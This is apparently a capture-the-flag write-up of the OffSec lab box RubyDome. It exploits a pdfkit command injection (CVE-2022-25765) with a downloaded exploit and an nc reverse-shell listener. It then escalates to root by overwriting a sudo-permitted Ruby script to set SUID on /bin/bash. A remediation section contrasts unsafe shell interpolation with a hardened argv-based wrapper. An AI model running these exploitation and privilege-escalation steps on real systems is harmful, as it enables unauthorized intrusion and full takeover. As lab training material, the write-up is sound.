Key takeaways
- Read the error message carefully and pick out the key information
- Check what the current user is permitted to do
Steps
An nmap scan shows port 3000 open and serving HTTP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-09 14:43 UTC
Nmap scan report for #remote_ip#
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
3000/tcp open http WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
|_http-title: RubyDome HTML to PDF
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 0.66 ms pg-bafw54.offseclabs.com (192.168.50.254)
2 1.25 ms 192.168.54.22
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.70 seconds
Opening it in a browser shows what looks like a Ruby HTML-to-PDF page that takes a url parameter; submitting http://google.com returns a PDF.
Submitting http://www.baidu.com instead returns an error, and the error page reveals wkhtmltopdf and pdfkit.rb.
Googling "pdfkit exploit" turns up CVE-2022-25765, which applies here.
After downloading the exploit, start nc -nlvp 9000 locally, then run
python 51293.py -s #local_ip# 9000 -w http://#remote_ip#:3000/pdf -p url
The reverse shell is established, and sudo /usr/bin/ruby /home/andrew/app/app.rb can be run without a password:
listening on [any] 9000 ...
connect to [#local_ip#] from (UNKNOWN) [#remote_ip#] 42544
id
uid=1001(andrew) gid=1001(andrew) groups=1001(andrew),27(sudo)
sudo -l
Matching Defaults entries for andrew on rubydome:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User andrew may run the following commands on rubydome:
(ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb
pwd
/home/andrew/app
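On the application side the root cause is that the user-supplied url parameter ends up inside a shell command line built by pdfkit (CVE-2022-25765); the durable fix is upgrading pdfkit to a patched release. The Ruby below is an added illustration, not the RubyDome app's code or pdfkit's: it puts the interpolated-string pattern beside a hardened wrapper that validates the URL and calls wkhtmltopdf through an argv array so no shell ever parses it. The wkhtmltopdf path and all function names are assumptions.

```ruby
require 'uri'

# Constructed illustration, not the RubyDome app's code or pdfkit's: the
# dangerous pattern is a shell command line built by string interpolation
# from the url parameter, which is the class of bug behind CVE-2022-25765.
# The wkhtmltopdf path and every function name here are assumptions.
WKHTMLTOPDF = '/usr/bin/wkhtmltopdf'.freeze

# Unsafe: the URL is spliced into one string that /bin/sh will parse, so any
# shell metacharacter that survives the quoting becomes a command.
def build_shell_command(url)
  "#{WKHTMLTOPDF} --quiet \"#{url}\" -"
end

# Hardened: accept only a plain http(s) URL with a real hostname and return
# the normalized form; everything else is refused with ArgumentError.
def validate_pdf_url!(raw)
  raise ArgumentError, 'empty url' if raw.nil? || raw.strip.empty?
  raise ArgumentError, 'url too long' if raw.length > 2048
  raise ArgumentError, 'whitespace/control char' if raw =~ /[\s[:cntrl:]]/
  uri = URI.parse(raw)
  raise ArgumentError, 'only http/https' unless uri.is_a?(URI::HTTP)
  raise ArgumentError, 'missing host' if uri.host.nil? || uri.host.empty?
  raise ArgumentError, 'credentials in url' if uri.userinfo
  hostname = /\A[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*\z/i
  raise ArgumentError, 'bad hostname' unless uri.host =~ hostname
  uri.to_s
rescue URI::InvalidURIError => e
  raise ArgumentError, "unparseable url: #{e.message}"
end

# argv array: IO.popen with an array calls exec(2) directly, no /bin/sh.
def pdf_argv(raw_url)
  [WKHTMLTOPDF, '--quiet', validate_pdf_url!(raw_url), '-']
end

def render_pdf(raw_url)
  IO.popen(pdf_argv(raw_url), 'rb', &:read)
end

# Helper for checks: true when the hardened path refuses the input.
def rejected?(raw_url)
  pdf_argv(raw_url)
  false
rescue ArgumentError
  true
end
```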
Overwrite /home/andrew/app/app.rb so that it sets the SUID bit on /bin/bash
echo 'cmd = "chmod +s /bin/bash"
system( cmd )
' > app.rb
cat app.rb
cmd = "chmod +s /bin/bash"
system( cmd )
After running the following, root privileges have been obtained
sudo /usr/bin/ruby /home/andrew/app/app.rb
ls -l /bin/bash
-rwsr-sr-x 1 root root 1396520 Jan 6 2022 /bin/bash
/bin/bash -p
id
uid=1001(andrew) gid=1001(andrew) euid=0(root) egid=0(root) groups=0(root),27(sudo),1001(andrew)